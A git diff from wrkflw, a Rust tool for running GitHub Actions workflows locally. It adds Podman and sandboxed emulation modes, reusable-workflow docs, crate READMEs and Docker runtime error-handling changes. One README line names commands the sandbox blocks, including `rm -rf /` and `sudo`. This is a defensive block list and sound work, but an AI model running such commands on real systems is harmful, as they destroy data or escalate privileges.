- ✅ Job dependency resolution and parallel execution (all jobs with correct 'needs' relationships are executed in the right order, and independent jobs run in parallel)
|
||||
- ✅ Matrix builds (supported for reasonable matrix sizes; very large matrices may be slow or resource-intensive)
|
||||
- ✅ Environment variables and GitHub context (all standard GitHub Actions environment variables and context objects are emulated)
|
||||
- ✅ Docker container actions (all actions that use Docker containers are supported in Docker mode)
|
||||
- ✅ Container actions (all actions that use containers are supported in Docker and Podman modes)
|
||||
- ✅ JavaScript actions (all actions that use JavaScript are supported)
|
||||
- ✅ Composite actions (all composite actions, including nested and local composite actions, are supported)
|
||||
- ✅ Local actions (actions referenced with local paths are supported)
|
||||
- ✅ Special handling for common actions (e.g., `actions/checkout` is natively supported)
|
||||
- ✅ Reusable workflows (caller): Jobs that use `jobs.<id>.uses` to call local or remote workflows are executed; inputs and secrets are propagated to the called workflow
|
||||
- ✅ Workflow triggering via `workflow_dispatch` (manual triggering of workflows is supported)
|
||||
- ✅ GitLab pipeline triggering (manual triggering of GitLab pipelines is supported)
|
||||
- ✅ Environment files (`GITHUB_OUTPUT`, `GITHUB_ENV`, `GITHUB_PATH`, `GITHUB_STEP_SUMMARY` are fully supported)
|
||||
@@ -245,35 +390,81 @@ WRKFLW automatically cleans up any Docker containers created during workflow exe
|
||||
|
||||
### Limited or Unsupported Features (Explicit List)
|
||||
- ❌ GitHub secrets and permissions: Only basic environment variables are supported. GitHub's encrypted secrets and fine-grained permissions are NOT available.
|
||||
- ❌ GitHub Actions cache: Caching functionality (e.g., `actions/cache`) is NOT supported in emulation mode and only partially supported in Docker mode (no persistent cache between runs).
|
||||
- ❌ GitHub Actions cache: Caching functionality (e.g., `actions/cache`) is NOT supported in emulation mode and only partially supported in Docker and Podman modes (no persistent cache between runs).
|
||||
- ❌ GitHub API integrations: Only basic workflow triggering is supported. Features like workflow status reporting, artifact upload/download, and API-based job control are NOT available.
|
||||
- ❌ GitHub-specific environment variables: Some advanced or dynamic environment variables (e.g., those set by GitHub runners or by the GitHub API) are emulated with static or best-effort values, but not all are fully functional.
|
||||
- ❌ Large/complex matrix builds: Very large matrices (hundreds or thousands of job combinations) may not be practical due to performance and resource limits.
|
||||
- ❌ Network-isolated actions: Actions that require strict network isolation or custom network configuration may not work out-of-the-box and may require manual Docker configuration.
|
||||
- ❌ Network-isolated actions: Actions that require strict network isolation or custom network configuration may not work out-of-the-box and may require manual container runtime configuration.
|
||||
- ❌ Some event triggers: Only `workflow_dispatch` (manual trigger) is fully supported. Other triggers (e.g., `push`, `pull_request`, `schedule`, `release`, etc.) are NOT supported.
|
||||
- ❌ GitHub runner-specific features: Features that depend on the exact GitHub-hosted runner environment (e.g., pre-installed tools, runner labels, or hardware) are NOT guaranteed to match. Only a best-effort emulation is provided.
|
||||
- ❌ Windows and macOS runners: Only Linux-based runners are fully supported. Windows and macOS jobs are NOT supported.
|
||||
- ❌ Service containers: Service containers (e.g., databases defined in `services:`) are only supported in Docker mode. In emulation mode, they are NOT supported.
|
||||
- ❌ Service containers: Service containers (e.g., databases defined in `services:`) are only supported in Docker and Podman modes. In emulation mode, they are NOT supported.
|
||||
- ❌ Artifacts: Uploading and downloading artifacts between jobs/steps is NOT supported.
|
||||
- ❌ Job/step timeouts: Custom timeouts for jobs and steps are NOT enforced.
|
||||
- ❌ Job/step concurrency and cancellation: Features like `concurrency` and job cancellation are NOT supported.
|
||||
- ❌ Expressions and advanced YAML features: Most common expressions are supported, but some advanced or edge-case expressions may not be fully implemented.
|
||||
- ⚠️ Reusable workflows (limits):
|
||||
- Outputs from called workflows are not propagated back to the caller (`needs.<id>.outputs.*` not supported)
|
||||
- `secrets: inherit` is not special-cased; provide a mapping to pass secrets
|
||||
- Remote calls clone public repos via HTTPS; private repos require preconfigured access (not yet implemented)
|
||||
- Deeply nested reusable calls work but lack cycle detection beyond regular job dependency checks
|
||||
|
||||
## Reusable Workflows
|
||||
|
||||
WRKFLW supports executing reusable workflow caller jobs.
|
||||
|
||||
### Syntax
|
||||
|
||||
```yaml
|
||||
jobs:
|
||||
call-local:
|
||||
uses: ./.github/workflows/shared.yml
|
||||
|
||||
call-remote:
|
||||
uses: my-org/my-repo/.github/workflows/shared.yml@v1
|
||||
with:
|
||||
foo: bar
|
||||
secrets:
|
||||
token: ${{ secrets.MY_TOKEN }}
|
||||
```
|
||||
|
||||
### Behavior
|
||||
- Local references are resolved relative to the current working directory.
|
||||
- Remote references are shallow-cloned at the specified `@ref` into a temporary directory.
|
||||
- `with:` entries are exposed to the called workflow as environment variables `INPUT_<KEY>`.
|
||||
- `secrets:` mapping entries are exposed as environment variables `SECRET_<KEY>`.
|
||||
- The called workflow executes according to its own `jobs`/`needs`; a summary of its job results is reported as a single result for the caller job.
|
||||
|
||||
### Current limitations
|
||||
- Outputs from called workflows are not surfaced back to the caller.
|
||||
- `secrets: inherit` is not supported; specify an explicit mapping.
|
||||
- Private repositories for remote `uses:` are not yet supported.
|
||||
|
||||
### Runtime Mode Differences
|
||||
- **Docker Mode**: Provides the closest match to GitHub's environment, including support for Docker container actions, service containers, and Linux-based jobs. Some advanced container configurations may still require manual setup.
|
||||
- **Emulation Mode**: Runs workflows using the local system tools. Limitations:
|
||||
- **Podman Mode**: Similar to Docker mode but uses Podman for container execution. Offers rootless container support and enhanced security. Fully compatible with Docker-based workflows.
|
||||
- **🔒 Secure Emulation Mode**: Runs workflows on the local system with comprehensive sandboxing for security. **Recommended for local development**:
|
||||
- Command validation and filtering (blocks dangerous commands like `rm -rf /`, `sudo`, etc.)
|
||||
- Resource limits (CPU, memory, execution time)
|
||||
- Filesystem access controls
|
||||
- Process monitoring and limits
|
||||
- Safe for running untrusted workflows locally
|
||||
- **⚠️ Emulation Mode (Legacy)**: Runs workflows using local system tools without sandboxing. **Not recommended - use Secure Emulation instead**:
|
||||
- Only supports local and JavaScript actions (no Docker container actions)
|
||||
- No support for service containers
|
||||
- No caching support
|
||||
- **No security protections - can execute harmful commands**
|
||||
- Some actions may require adaptation to work locally
|
||||
- Special action handling is more limited
|
||||
|
||||
### Best Practices
|
||||
- Test workflows in both Docker and emulation modes to ensure compatibility
|
||||
- **Use Secure Emulation mode for local development** - provides safety without container overhead
|
||||
- Test workflows in multiple runtime modes to ensure compatibility
|
||||
- **Use Docker/Podman mode for production** - provides maximum isolation and reproducibility
|
||||
- Keep matrix builds reasonably sized for better performance
|
||||
- Use environment variables instead of GitHub secrets when possible
|
||||
- Consider using local actions for complex custom functionality
|
||||
- Test network-dependent actions carefully in both modes
|
||||
- **Review security warnings** - pay attention to blocked commands in secure emulation mode
|
||||
- **Start with secure mode** - only fall back to legacy emulation if necessary
|
||||
|
||||
## Roadmap
|
||||
|
||||
@@ -315,7 +506,7 @@ The following roadmap outlines our planned approach to implementing currently un
|
||||
### 6. Network-Isolated Actions
|
||||
- **Goal:** Support custom network configurations and strict isolation for actions.
|
||||
- **Plan:**
|
||||
- Add advanced Docker network configuration options.
|
||||
- Add advanced container network configuration options for Docker and Podman.
|
||||
- Document best practices for network isolation.
|
||||
|
||||
### 7. Event Triggers
|
||||
|
||||
97
crates/README.md
Normal file
97
crates/README.md
Normal file
@@ -0,0 +1,97 @@
|
||||
# Wrkflw Crates
|
||||
|
||||
This directory contains the Rust crates that make up the Wrkflw project. The project has been restructured to use a workspace-based approach with individual crates for better modularity and maintainability.
|
||||
|
||||
## Crate Structure
|
||||
|
||||
- **wrkflw**: Main binary crate and entry point for the application
|
||||
- **models**: Data models and structures used throughout the application
|
||||
- **evaluator**: Workflow evaluation functionality
|
||||
- **executor**: Workflow execution engine
|
||||
- **github**: GitHub API integration
|
||||
- **gitlab**: GitLab API integration
|
||||
- **logging**: Logging functionality
|
||||
- **matrix**: Matrix-based parallelization support
|
||||
- **parser**: Workflow parsing functionality
|
||||
- **runtime**: Runtime execution environment
|
||||
- **ui**: User interface components
|
||||
- **utils**: Utility functions
|
||||
- **validators**: Validation functionality
|
||||
|
||||
## Dependencies
|
||||
|
||||
Each crate has its own `Cargo.toml` file that defines its dependencies. The root `Cargo.toml` file defines the workspace and shared dependencies.
|
||||
|
||||
## Build Instructions
|
||||
|
||||
To build the entire project:
|
||||
|
||||
```bash
|
||||
cargo build
|
||||
```
|
||||
|
||||
To build a specific crate:
|
||||
|
||||
```bash
|
||||
cargo build -p <crate-name>
|
||||
```
|
||||
|
||||
## Testing
|
||||
|
||||
To run tests for the entire project:
|
||||
|
||||
```bash
|
||||
cargo test
|
||||
```
|
||||
|
||||
To run tests for a specific crate:
|
||||
|
||||
```bash
|
||||
cargo test -p <crate-name>
|
||||
```
|
||||
|
||||
## Rust Best Practices
|
||||
|
||||
When contributing to wrkflw, please follow these Rust best practices:
|
||||
|
||||
### Code Organization
|
||||
|
||||
- Place modules in their respective crates to maintain separation of concerns
|
||||
- Use `pub` selectively to expose only the necessary APIs
|
||||
- Follow the Rust module system conventions (use `mod` and `pub mod` appropriately)
|
||||
|
||||
### Errors and Error Handling
|
||||
|
||||
- Prefer using the `thiserror` crate for defining custom error types
|
||||
- Use the `?` operator for error propagation instead of match statements when appropriate
|
||||
- Implement custom error types that provide context for the error
|
||||
- Avoid using `.unwrap()` and `.expect()` in production code
|
||||
|
||||
### Performance
|
||||
|
||||
- Profile code before optimizing using tools like `cargo flamegraph`
|
||||
- Use `Arc` and `Mutex` judiciously for shared mutable state
|
||||
- Leverage Rust's zero-cost abstractions (iterators, closures)
|
||||
- Consider adding benchmark tests using the `criterion` crate for performance-critical code
|
||||
|
||||
### Security
|
||||
|
||||
- Validate all input, especially from external sources
|
||||
- Avoid using `unsafe` code unless absolutely necessary
|
||||
- Handle secrets securely using environment variables
|
||||
- Check for integer overflows with `checked_` operations
|
||||
|
||||
### Testing
|
||||
|
||||
- Write unit tests for all public functions
|
||||
- Use integration tests to verify crate-to-crate interactions
|
||||
- Consider property-based testing for complex logic
|
||||
- Structure tests with clear preparation, execution, and verification phases
|
||||
|
||||
### Tooling
|
||||
|
||||
- Run `cargo clippy` before committing changes to catch common mistakes
|
||||
- Use `cargo fmt` to maintain consistent code formatting
|
||||
- Enable compiler warnings with `#![warn(clippy::all)]`
|
||||
|
||||
For more detailed guidance, refer to the project's best practices documentation.
|
||||
20
crates/evaluator/Cargo.toml
Normal file
20
crates/evaluator/Cargo.toml
Normal file
@@ -0,0 +1,20 @@
|
||||
[package]
|
||||
name = "wrkflw-evaluator"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Workflow evaluation functionality for wrkflw execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-validators = { path = "../validators", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
colored.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
29
crates/evaluator/README.md
Normal file
29
crates/evaluator/README.md
Normal file
@@ -0,0 +1,29 @@
|
||||
## wrkflw-evaluator
|
||||
|
||||
Small, focused helper for statically evaluating GitHub Actions workflow files.
|
||||
|
||||
- **Purpose**: Fast structural checks (e.g., `name`, `on`, `jobs`) before deeper validation/execution
|
||||
- **Used by**: `wrkflw` CLI and TUI during validation flows
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use std::path::Path;
|
||||
|
||||
let result = wrkflw_evaluator::evaluate_workflow_file(
|
||||
Path::new(".github/workflows/ci.yml"),
|
||||
/* verbose */ true,
|
||||
).expect("evaluation failed");
|
||||
|
||||
if result.is_valid {
|
||||
println!("Workflow looks structurally sound");
|
||||
} else {
|
||||
for issue in result.issues {
|
||||
println!("- {}", issue);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Notes
|
||||
- This crate focuses on structural checks; deeper rules live in `wrkflw-validators`.
|
||||
- Most consumers should prefer the top-level `wrkflw` CLI for end-to-end UX.
|
||||
@@ -3,8 +3,8 @@ use serde_yaml::{self, Value};
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
|
||||
use crate::models::ValidationResult;
|
||||
use crate::validators::{validate_jobs, validate_triggers};
|
||||
use wrkflw_models::ValidationResult;
|
||||
use wrkflw_validators::{validate_jobs, validate_triggers};
|
||||
|
||||
pub fn evaluate_workflow_file(path: &Path, verbose: bool) -> Result<ValidationResult, String> {
|
||||
let content = fs::read_to_string(path).map_err(|e| format!("Failed to read file: {}", e))?;
|
||||
40
crates/executor/Cargo.toml
Normal file
40
crates/executor/Cargo.toml
Normal file
@@ -0,0 +1,40 @@
|
||||
[package]
|
||||
name = "wrkflw-executor"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Workflow execution engine for wrkflw"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-parser = { path = "../parser", version = "0.7.0" }
|
||||
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
async-trait.workspace = true
|
||||
bollard.workspace = true
|
||||
chrono.workspace = true
|
||||
dirs.workspace = true
|
||||
futures.workspace = true
|
||||
futures-util.workspace = true
|
||||
lazy_static.workspace = true
|
||||
num_cpus.workspace = true
|
||||
once_cell.workspace = true
|
||||
regex.workspace = true
|
||||
serde.workspace = true
|
||||
serde_json.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
tar.workspace = true
|
||||
tempfile.workspace = true
|
||||
thiserror.workspace = true
|
||||
tokio.workspace = true
|
||||
uuid.workspace = true
|
||||
29
crates/executor/README.md
Normal file
29
crates/executor/README.md
Normal file
@@ -0,0 +1,29 @@
|
||||
## wrkflw-executor
|
||||
|
||||
The execution engine that runs GitHub Actions workflows locally (Docker, Podman, or emulation).
|
||||
|
||||
- **Features**:
|
||||
- Job graph execution with `needs` ordering and parallelism
|
||||
- Docker/Podman container steps and emulation mode
|
||||
- Basic environment/context wiring compatible with Actions
|
||||
- **Used by**: `wrkflw` CLI and TUI
|
||||
|
||||
### API sketch
|
||||
|
||||
```rust
|
||||
use wrkflw_executor::{execute_workflow, ExecutionConfig, RuntimeType};
|
||||
|
||||
let cfg = ExecutionConfig {
|
||||
runtime: RuntimeType::Docker,
|
||||
verbose: true,
|
||||
preserve_containers_on_failure: false,
|
||||
};
|
||||
|
||||
// Path to a workflow YAML
|
||||
let workflow_path = std::path::Path::new(".github/workflows/ci.yml");
|
||||
|
||||
let result = execute_workflow(workflow_path, cfg).await?;
|
||||
println!("workflow status: {:?}", result.summary_status);
|
||||
```
|
||||
|
||||
Prefer using the `wrkflw` binary for a complete UX across validation, execution, and logs.
|
||||
@@ -1,5 +1,5 @@
|
||||
use crate::parser::workflow::WorkflowDefinition;
|
||||
use std::collections::{HashMap, HashSet};
|
||||
use wrkflw_parser::workflow::WorkflowDefinition;
|
||||
|
||||
pub fn resolve_dependencies(workflow: &WorkflowDefinition) -> Result<Vec<Vec<String>>, String> {
|
||||
let jobs = &workflow.jobs;
|
||||
@@ -1,5 +1,3 @@
|
||||
use crate::logging;
|
||||
use crate::runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use async_trait::async_trait;
|
||||
use bollard::{
|
||||
container::{Config, CreateContainerOptions},
|
||||
@@ -12,6 +10,10 @@ use once_cell::sync::Lazy;
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
use std::sync::Mutex;
|
||||
use wrkflw_logging;
|
||||
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use wrkflw_utils;
|
||||
use wrkflw_utils::fd;
|
||||
|
||||
static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
static CREATED_NETWORKS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
@@ -22,36 +24,58 @@ static CUSTOMIZED_IMAGES: Lazy<Mutex<HashMap<String, String>>> =
|
||||
|
||||
pub struct DockerRuntime {
|
||||
docker: Docker,
|
||||
preserve_containers_on_failure: bool,
|
||||
}
|
||||
|
||||
impl DockerRuntime {
|
||||
pub fn new() -> Result<Self, ContainerError> {
|
||||
Self::new_with_config(false)
|
||||
}
|
||||
|
||||
pub fn new_with_config(preserve_containers_on_failure: bool) -> Result<Self, ContainerError> {
|
||||
let docker = Docker::connect_with_local_defaults().map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to connect to Docker: {}", e))
|
||||
})?;
|
||||
|
||||
Ok(DockerRuntime { docker })
|
||||
Ok(DockerRuntime {
|
||||
docker,
|
||||
preserve_containers_on_failure,
|
||||
})
|
||||
}
|
||||
|
||||
// Add a method to store and retrieve customized images (e.g., with Python installed)
|
||||
#[allow(dead_code)]
|
||||
pub fn get_customized_image(base_image: &str, customization: &str) -> Option<String> {
|
||||
let key = format!("{}:{}", base_image, customization);
|
||||
let images = CUSTOMIZED_IMAGES.lock().unwrap();
|
||||
images.get(&key).cloned()
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[allow(dead_code)]
|
||||
pub fn set_customized_image(base_image: &str, customization: &str, new_image: &str) {
|
||||
let key = format!("{}:{}", base_image, customization);
|
||||
let mut images = CUSTOMIZED_IMAGES.lock().unwrap();
|
||||
images.insert(key, new_image.to_string());
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
/// Find a customized image key by prefix
|
||||
#[allow(dead_code)]
|
||||
pub fn find_customized_image_key(image: &str, prefix: &str) -> Option<String> {
|
||||
let image_keys = CUSTOMIZED_IMAGES.lock().unwrap();
|
||||
let image_keys = match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(keys) => keys,
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
return None;
|
||||
}
|
||||
};
|
||||
|
||||
// Look for any key that starts with the prefix
|
||||
for (key, _) in image_keys.iter() {
|
||||
@@ -80,8 +104,13 @@ impl DockerRuntime {
|
||||
(lang, None) => lang.to_string(),
|
||||
};
|
||||
|
||||
let images = CUSTOMIZED_IMAGES.lock().unwrap();
|
||||
images.get(&key).cloned()
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Set a customized image with language-specific dependencies
|
||||
@@ -102,8 +131,11 @@ impl DockerRuntime {
|
||||
(lang, None) => lang.to_string(),
|
||||
};
|
||||
|
||||
let mut images = CUSTOMIZED_IMAGES.lock().unwrap();
|
||||
images.insert(key, new_image.to_string());
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
/// Prepare a language-specific environment
|
||||
@@ -250,7 +282,7 @@ pub fn is_available() -> bool {
|
||||
// Spawn a thread with the timeout to prevent blocking the main thread
|
||||
let handle = std::thread::spawn(move || {
|
||||
// Use safe FD redirection utility to suppress Docker error messages
|
||||
match crate::utils::fd::with_stderr_to_null(|| {
|
||||
match fd::with_stderr_to_null(|| {
|
||||
// First, check if docker CLI is available as a quick test
|
||||
if cfg!(target_os = "linux") || cfg!(target_os = "macos") {
|
||||
// Try a simple docker version command with a short timeout
|
||||
@@ -286,7 +318,7 @@ pub fn is_available() -> bool {
|
||||
}
|
||||
}
|
||||
Err(_) => {
|
||||
logging::debug("Docker CLI is not available");
|
||||
wrkflw_logging::debug("Docker CLI is not available");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
@@ -299,7 +331,7 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(rt) => rt,
|
||||
Err(e) => {
|
||||
logging::error(&format!(
|
||||
wrkflw_logging::error(&format!(
|
||||
"Failed to create runtime for Docker availability check: {}",
|
||||
e
|
||||
));
|
||||
@@ -320,17 +352,25 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(Ok(_)) => true,
|
||||
Ok(Err(e)) => {
|
||||
logging::debug(&format!("Docker daemon ping failed: {}", e));
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Docker daemon ping failed: {}",
|
||||
e
|
||||
));
|
||||
false
|
||||
}
|
||||
Err(_) => {
|
||||
logging::debug("Docker daemon ping timed out after 1 second");
|
||||
wrkflw_logging::debug(
|
||||
"Docker daemon ping timed out after 1 second",
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
logging::debug(&format!("Docker daemon connection failed: {}", e));
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Docker daemon connection failed: {}",
|
||||
e
|
||||
));
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -339,7 +379,7 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::debug("Docker availability check timed out");
|
||||
wrkflw_logging::debug("Docker availability check timed out");
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -347,7 +387,9 @@ pub fn is_available() -> bool {
|
||||
}) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::debug("Failed to redirect stderr when checking Docker availability");
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability",
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -361,7 +403,7 @@ pub fn is_available() -> bool {
|
||||
return match handle.join() {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::warning("Docker availability check thread panicked");
|
||||
wrkflw_logging::warning("Docker availability check thread panicked");
|
||||
false
|
||||
}
|
||||
};
|
||||
@@ -369,7 +411,9 @@ pub fn is_available() -> bool {
|
||||
std::thread::sleep(std::time::Duration::from_millis(50));
|
||||
}
|
||||
|
||||
logging::warning("Docker availability check timed out, assuming Docker is not available");
|
||||
wrkflw_logging::warning(
|
||||
"Docker availability check timed out, assuming Docker is not available",
|
||||
);
|
||||
false
|
||||
}
|
||||
|
||||
@@ -412,19 +456,19 @@ pub async fn cleanup_resources(docker: &Docker) {
|
||||
tokio::join!(cleanup_containers(docker), cleanup_networks(docker));
|
||||
|
||||
if let Err(e) = container_result {
|
||||
logging::error(&format!("Error during container cleanup: {}", e));
|
||||
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
|
||||
}
|
||||
|
||||
if let Err(e) = network_result {
|
||||
logging::error(&format!("Error during network cleanup: {}", e));
|
||||
wrkflw_logging::error(&format!("Error during network cleanup: {}", e));
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Docker cleanup completed within timeout"),
|
||||
Err(_) => {
|
||||
logging::warning("Docker cleanup timed out, some resources may not have been removed")
|
||||
}
|
||||
Ok(_) => wrkflw_logging::debug("Docker cleanup completed within timeout"),
|
||||
Err(_) => wrkflw_logging::warning(
|
||||
"Docker cleanup timed out, some resources may not have been removed",
|
||||
),
|
||||
}
|
||||
}
|
||||
|
||||
@@ -436,7 +480,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
match RUNNING_CONTAINERS.try_lock() {
|
||||
Ok(containers) => containers.clone(),
|
||||
Err(_) => {
|
||||
logging::error("Could not acquire container lock for cleanup");
|
||||
wrkflw_logging::error("Could not acquire container lock for cleanup");
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
@@ -445,7 +489,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
{
|
||||
Ok(containers) => containers,
|
||||
Err(_) => {
|
||||
logging::error("Timeout while trying to get containers for cleanup");
|
||||
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
|
||||
vec![]
|
||||
}
|
||||
};
|
||||
@@ -454,7 +498,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up {} containers",
|
||||
containers_to_cleanup.len()
|
||||
));
|
||||
@@ -468,11 +512,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::debug(&format!("Stopped container: {}", container_id)),
|
||||
Ok(Err(e)) => {
|
||||
logging::warning(&format!("Error stopping container {}: {}", container_id, e))
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Stopped container: {}", container_id)),
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error stopping container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
|
||||
}
|
||||
Err(_) => logging::warning(&format!("Timeout stopping container: {}", container_id)),
|
||||
}
|
||||
|
||||
// Then try to remove it
|
||||
@@ -482,11 +529,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::debug(&format!("Removed container: {}", container_id)),
|
||||
Ok(Err(e)) => {
|
||||
logging::warning(&format!("Error removing container {}: {}", container_id, e))
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Removed container: {}", container_id)),
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error removing container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
|
||||
}
|
||||
Err(_) => logging::warning(&format!("Timeout removing container: {}", container_id)),
|
||||
}
|
||||
|
||||
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
|
||||
@@ -504,7 +554,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
match CREATED_NETWORKS.try_lock() {
|
||||
Ok(networks) => networks.clone(),
|
||||
Err(_) => {
|
||||
logging::error("Could not acquire network lock for cleanup");
|
||||
wrkflw_logging::error("Could not acquire network lock for cleanup");
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
@@ -513,7 +563,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
{
|
||||
Ok(networks) => networks,
|
||||
Err(_) => {
|
||||
logging::error("Timeout while trying to get networks for cleanup");
|
||||
wrkflw_logging::error("Timeout while trying to get networks for cleanup");
|
||||
vec![]
|
||||
}
|
||||
};
|
||||
@@ -522,7 +572,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up {} networks",
|
||||
networks_to_cleanup.len()
|
||||
));
|
||||
@@ -534,9 +584,13 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::info(&format!("Successfully removed network: {}", network_id)),
|
||||
Ok(Err(e)) => logging::error(&format!("Error removing network {}: {}", network_id, e)),
|
||||
Err(_) => logging::warning(&format!("Timeout removing network: {}", network_id)),
|
||||
Ok(Ok(_)) => {
|
||||
wrkflw_logging::info(&format!("Successfully removed network: {}", network_id))
|
||||
}
|
||||
Ok(Err(e)) => {
|
||||
wrkflw_logging::error(&format!("Error removing network {}: {}", network_id, e))
|
||||
}
|
||||
Err(_) => wrkflw_logging::warning(&format!("Timeout removing network: {}", network_id)),
|
||||
}
|
||||
|
||||
// Always untrack the network whether or not we succeeded
|
||||
@@ -567,7 +621,7 @@ pub async fn create_job_network(docker: &Docker) -> Result<String, ContainerErro
|
||||
})?;
|
||||
|
||||
track_network(&network_id);
|
||||
logging::info(&format!("Created Docker network: {}", network_id));
|
||||
wrkflw_logging::info(&format!("Created Docker network: {}", network_id));
|
||||
|
||||
Ok(network_id)
|
||||
}
|
||||
@@ -583,7 +637,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
// Print detailed debugging info
|
||||
logging::info(&format!("Docker: Running container with image: {}", image));
|
||||
wrkflw_logging::info(&format!("Docker: Running container with image: {}", image));
|
||||
|
||||
// Add a global timeout for all Docker operations to prevent freezing
|
||||
let timeout_duration = std::time::Duration::from_secs(360); // Increased outer timeout to 6 minutes
|
||||
@@ -597,7 +651,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::error("Docker operation timed out after 360 seconds");
|
||||
wrkflw_logging::error("Docker operation timed out after 360 seconds");
|
||||
